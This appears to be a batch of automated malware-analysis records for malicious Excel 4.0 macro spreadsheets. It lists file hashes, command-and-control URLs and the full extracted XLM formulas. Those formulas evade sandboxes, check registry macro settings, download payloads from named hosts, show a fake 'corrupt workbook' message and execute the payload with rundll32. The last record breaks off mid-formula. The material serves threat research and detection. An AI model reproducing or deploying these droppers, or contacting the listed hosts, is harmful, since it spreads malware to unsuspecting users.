{"version":"0.2","sample":{"sample":"","kind":"file","target":"08b89b345d99b4fce366e1a57384b52778809e5d08cc1e00da5511e07455a11e"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08b89b345d99b4fce366e1a57384b52778809e5d08cc1e00da5511e07455a11e","filesize":219136,"md5":"382a14fc0516c3748d2dba39f4804e6a","sha1":"4de5cfae6369f21488a79c41e10344b35d542bc0","sha256":"08b89b345d99b4fce366e1a57384b52778809e5d08cc1e00da5511e07455a11e","sha512":"b1e057ccb2c6f4774f07830dd2a51729b8ac84c8259e3aefa1ca07a7e113dc662764818139275812131dbd3f6f466b0dcb8267a9360f9d7579665bd4d54dc755","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08b89b345d99b4fce366e1a57384b52778809e5d08cc1e00da5511e07455a11e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ltDR9mlKE4\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08d8b4ccdc38c4caf4bbaee1053a0acaf15c7f5464a06dc7baddf4ce245a38b3"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08d8b4ccdc38c4caf4bbaee1053a0acaf15c7f5464a06dc7baddf4ce245a38b3","filesize":209920,"md5":"c9647d03b9a3afe25c5ed35d09eed229","sha1":"5333dff6beb07fe8362e42d6138665d97520dbfb","sha256":"08d8b4ccdc38c4caf4bbaee1053a0acaf15c7f5464a06dc7baddf4ce245a38b3","sha512":"deeeb2379e5d46b19563f1f0a6df998c5dc0ae1cd844c3baaaca24d6710da27337ed715dd593e1b402ac09a2c83347f0d79693094f32a6eb8b25883f4de964d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08d8b4ccdc38c4caf4bbaee1053a0acaf15c7f5464a06dc7baddf4ce245a38b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wYLZI1tF5a\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08dddf2def95f3218c9b491ae3d842a1471e4025c4106c2f5daa1473338364a0"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08dddf2def95f3218c9b491ae3d842a1471e4025c4106c2f5daa1473338364a0","filesize":185344,"md5":"2cc8c23d3837c988f8d1a7da81ab7d26","sha1":"d568a810afd580108c8c1eb4b6e7fd125c9e6459","sha256":"08dddf2def95f3218c9b491ae3d842a1471e4025c4106c2f5daa1473338364a0","sha512":"95e54e8f151aab0f097e0fe38b0076dd3318efef722b7e6206769330da6b89b24bc1dedb0b39ab86033595c4a96b078048ab481cd547895d9cc9b19c909faed8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08dddf2def95f3218c9b491ae3d842a1471e4025c4106c2f5daa1473338364a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08e7d5bea859f8c174317c158d6c43acd077b3a64e431f9f7844d8f87b7146a3"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08e7d5bea859f8c174317c158d6c43acd077b3a64e431f9f7844d8f87b7146a3","filesize":160768,"md5":"c4f3b6e41d5ec4fa5d0dbc8dc031841a","sha1":"c6800891339965d30393912f861d0ff15f452e43","sha256":"08e7d5bea859f8c174317c158d6c43acd077b3a64e431f9f7844d8f87b7146a3","sha512":"80518e4f6550196c7749fedf3c99f89f62fa915868c3b68c5b65ef825d9acd98126771b81290970a5b031429fbd6ef4ab02012e7b469ca8c3ef9903217058a7d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08e7d5bea859f8c174317c158d6c43acd077b3a64e431f9f7844d8f87b7146a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rVX61YckmF\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08e8865fb1ce5aa90223eb4961bbedc6e92cebace73497b2afa69e03b0d64929"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08e8865fb1ce5aa90223eb4961bbedc6e92cebace73497b2afa69e03b0d64929","filesize":167936,"md5":"014ab9cc7669b8548e2d875a2f38a71e","sha1":"a1818e0c1aa45c71534d0de65813e59c6c126733","sha256":"08e8865fb1ce5aa90223eb4961bbedc6e92cebace73497b2afa69e03b0d64929","sha512":"80bf315ba445bc516a9c655df51b919a051b6b82e4f529a247c82b72cfa770ea721fda2c8916eaff6b99d6734e45cb455fb82d0015ecf5b35cf73f068a89b1bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08e8865fb1ce5aa90223eb4961bbedc6e92cebace73497b2afa69e03b0d64929.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HeSVFY6V1E\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08f84f0131afd5e01602d0356c82b5a82c4c77bcd7cec81acdede5e2b118c7cb"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08f84f0131afd5e01602d0356c82b5a82c4c77bcd7cec81acdede5e2b118c7cb","filesize":104448,"md5":"dababa2e0eba23d9d6db17f41aa731d6","sha1":"1625aa8c6e09ea4eaabef558181962749cd543e4","sha256":"08f84f0131afd5e01602d0356c82b5a82c4c77bcd7cec81acdede5e2b118c7cb","sha512":"e28fb5320860df119621be94bbc344abe044af22f712b2e8deba2311d9d2f2c62f99b165a39f7a23cd272f343d12dca9239d4df80095b6305acfe091beba9c8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08f84f0131afd5e01602d0356c82b5a82c4c77bcd7cec81acdede5e2b118c7cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"n5aBXVcdcw\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08fa265c5b494dc7c74e2cd753165b1dc12be4bd30c315f5b8821907c0f93b53"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08fa265c5b494dc7c74e2cd753165b1dc12be4bd30c315f5b8821907c0f93b53","filesize":116224,"md5":"93af0bcbbdb68a01493093b8c114edef","sha1":"9b55100f14619b76902c8d06010702dcbb9a32a8","sha256":"08fa265c5b494dc7c74e2cd753165b1dc12be4bd30c315f5b8821907c0f93b53","sha512":"62f217a73031b9621d2d2b64421a6b157d4a24d970e9319e4dc4021bab9fe7fc705523ad1a82c38118051cbb8c1f031ad05489535aa02ca590ed46fa06006b1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08fa265c5b494dc7c74e2cd753165b1dc12be4bd30c315f5b8821907c0f93b53.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xJynOZUSMQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09018ccf920a59d15d9e5b06628ac98737caeec4e68d0d981e1a43cdf76562c8"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"09018ccf920a59d15d9e5b06628ac98737caeec4e68d0d981e1a43cdf76562c8","filesize":209920,"md5":"ac4fe8ee3e630900ce53f5431444124d","sha1":"4795efc89eae4664924c136df8f2481dfc06daa0","sha256":"09018ccf920a59d15d9e5b06628ac98737caeec4e68d0d981e1a43cdf76562c8","sha512":"0a87407f27fee3e1aff5c46ceb9b9f7a80c668e0e78c302b90133d3b7c921dfded873f83100fb5cf88b0d1f63f959895815d73debbd2ba8c6f2acc99cc274966","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09018ccf920a59d15d9e5b06628ac98737caeec4e68d0d981e1a43cdf76562c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NFdysm7RcQ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09095b19776da04357b9a56666d189c18b8750a3b96df8c3265496a7428d9d95"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"09095b19776da04357b9a56666d189c18b8750a3b96df8c3265496a7428d9d95","filesize":209920,"md5":"d66d75fba71cdc4df8ac40b46057ef41","sha1":"4af4552b3cb551f21c395a2d4023a0d62b9e9aec","sha256":"09095b19776da04357b9a56666d189c18b8750a3b96df8c3265496a7428d9d95","sha512":"98b4f85258dd9ec47e7ac6803e26c6573a7b5600186ae7b5b499b52111596e314c2a09aa860ebc18ab01c963aaa4b73b5a05fb37e9121a368c94969844a2a64b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09095b19776da04357b9a56666d189c18b8750a3b96df8c3265496a7428d9d95.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0ECGJSyhGY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"091f797117c5a54a178f3c8899246295fd77d15efbbfc86c0865ad046a452e0a"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"091f797117c5a54a178f3c8899246295fd77d15efbbfc86c0865ad046a452e0a","filesize":167936,"md5":"7b52c127247d5ceb530a48e753038b4a","sha1":"8208f889f40b2d69cca31886993795e621581c1c","sha256":"091f797117c5a54a178f3c8899246295fd77d15efbbfc86c0865ad046a452e0a","sha512":"f6e7d3aa5df68880ccda165cfb53daec866828c06b260c5a42698ede303f986c8a737f3f8a19051b0caa9f22565d91bb726ba6c1e12e54221d9c3ffe4ca5441b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"091f797117c5a54a178f3c8899246295fd77d15efbbfc86c0865ad046a452e0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"L3YlUXWrmR\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0931ef0dd93c451483f152e4c1e7972fed6a5483016c1c49edecedce33d1337b"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"0931ef0dd93c451483f152e4c1e7972fed6a5483016c1c49edecedce33d1337b","filesize":112640,"md5":"38446e31d7cd4b6b3322fe073bdf32fc","sha1":"2c166dac216bc64045c595d625ae93d54c886db9","sha256":"0931ef0dd93c451483f152e4c1e7972fed6a5483016c1c49edecedce33d1337b","sha512":"278c7400fcadf86622dc5aefe0dddf61dc6bdac2c9890a3877cc9e9e994042ab18ad2b3a9ff123a6cbdac9c1f0d470b6507743c46f970679743ed25902ba269a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0931ef0dd93c451483f152e4c1e7972fed6a5483016c1c49edecedce33d1337b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09393397c90ea0405ca5fc616bd16a0bbe74231fc4fb82ec1a514c48552a5c4b"},"analysis":{"reported":"2020-04-09T16:14:47Z","score":10},"files":[{"filename":"09393397c90ea0405ca5fc616bd16a0bbe74231fc4fb82ec1a514c48552a5c4b","filesize":168960,"md5":"451e4464ab3a3d2474ca13de8f6cdb3b","sha1":"e641ba0e791d3fd04bb44a5e0412c69a39445536","sha256":"09393397c90ea0405ca5fc616bd16a0bbe74231fc4fb82ec1a514c48552a5c4b","sha512":"a44d7b8a0dfccb5194f57cc171410a8f1a096a64b47a3e514ec60b84a2002cc88bb18864996e6312561191122aedea5c6ae1d242e69cabdda35d44654a5204fe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09393397c90ea0405ca5fc616bd16a0bbe74231fc4fb82ec1a514c48552a5c4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FmJEkDOW4o\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09431215d7790c10e0c0e086b8dd2ddb879b0e04281af0f63900837395aeb742"},"analysis":{"reported":"2020-04-09T16:14:47Z","score":10},"files":[{"filename":"09431215d7790c10e0c0e086b8dd2ddb879b0e04281af0f63900837395aeb742","filesize":116224,"md5":"1f78bc0284a1af61bb62ad022707db7a","sha1":"fb787336e69b66240130efa62c84e0a92a36d0c8","sha256":"09431215d7790c10e0c0e086b8dd2ddb879b0e04281af0f63900837395aeb742","sha512":"4a152c60d4fd13fc5dd4849f736c4789c7d353053813b876d36fb26e29c8b8c7e81a68a81096cf8c04aa9b3d95751e1cfe7e8503a2c780a0f68e8ebcb4be25c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09431215d7790c10e0c0e086b8dd2ddb879b0e04281af0f63900837395aeb742.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hh4FTs36x1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"095295b6459ff92e3bbe24e9208b165e84ede3fc876face375b2217fe6f6a85c"},"analysis":{"reported":"2020-04-09T16:14:47Z","score":10},"files":[{"filename":"095295b6459ff92e3bbe24e9208b165e84ede3fc876face375b2217fe6f6a85c","filesize":160768,"md5":"a4f9ce03510c3063b0b325a568d4d0c8","sha1":"5a521220bd33214e0fe69b109ef851277f2e02e5","sha256":"095295b6459ff92e3bbe24e9208b165e84ede3fc876face375b2217fe6f6a85c","sha512":"abf1b39c7e2df97adaefba9693404d62b6d465710130a87b70ef454ddc1319c80c2ee91fafa6be653c6d7a392d87559cb7fd0d75e5f8e02df1e9c3de646f87a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"095295b6459ff92e3bbe24e9208b165e84ede3fc876face375b2217fe6f6a85c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NsGiiHNnWm\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"09701da5bbd6cda0858d3c8b62a7994668422321424bd669afdea55d205ffce6"},"analysis":{"reported":"2020-04-09T16:14:47Z","score":10},"files":[{"filename":"09701da5bbd6cda0858d3c8b62a7994668422321424bd669afdea55d205ffce6","filesize":170496,"md5":"ec9115b6af1ec3554ed4e41fc2fa4268","sha1":"cd9318048d5fc0bce600ae083eec9b1dc275ed07","sha256":"09701da5bbd6cda0858d3c8b62a7994668422321424bd669afdea55d205ffce6","sha512":"57f345c714d9b0abbda77fea4fce3ac10001932c0e200dd7f6127716aac8996e5d7d8132f14caea412ce86972e87e67b0d5ffb252d6371016e1c9b4bce04d4d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"09701da5bbd6cda0858d3c8b62a7994668422321424bd669afdea55d205ffce6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 